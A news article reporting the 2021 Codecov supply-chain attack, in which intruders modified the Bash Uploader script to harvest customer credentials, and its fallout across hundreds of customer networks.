Hackers attacked Codecov supply chain and compromise hundreds of networks
As it became known earlier this week, unknown hackers attacked and managed to compromise the online platform for testing software Codecov and added a credential collector to one of the tools.
The compromise affected the Bash Uploader, which allows Codecov customers to submit code coverage reports for analysis.The hacker gained access to the Bash Uploader script on January 31, 2021 and gradually made changes to it, adding malicious code that intercepted downloads, detected and collected any sensitive information, including credentials, tokens and keys.
“The entry point for the attacker was an error made by the developers during the Docker Codecov image creation process, which allowed the attacker to extract the credentials needed to make changes to the Bash Uploader script”, — the representatives of Codecov said.
The hack was discovered only on April 1, 2021, and the developers, together with third-party forensic experts, are investigating the incident. According to Reuters, now the researchers have come to the conclusion that the incident affected hundreds of customer networks, that is, the attack was much larger than originally anticipated.
The problem is that there are over 29,000 customers using Codecov, including well-known companies like GoDaddy, Atlassian, The Washington Post, Procter & Gamble (P&G), and so on. According to the US federal authorities, which are already investigating the incident, attackers used stolen customer credentials to access hundreds of networks.
“The hackers have made an extra effort to use Codecov to infiltrate the networks of other software vendors, as well as companies that provide their own technology services to others, including IBM”, — an anonymous source close to the investigation told the publication.
Bleeping Computer writes that the list of companies and projects on GitHub using Codecov is extensive, and a simple search for the link of a compromised Bash Uploader script reveals thousands of projects that have used or are using the script.
Although the exact scale of the incident is still unknown, representatives of Atlassian and Hewlett Packard Enterprise have already told reporters that they have carried out inspections and have found no signs of compromising their systems.
Let me remind you that we also wrote that North Korean hackers attack cybersecurity experts on social networks, and also that FireEye CEO Blames Chinese Hackers for Indiscriminate Cyberattacks on Microsoft Exchange.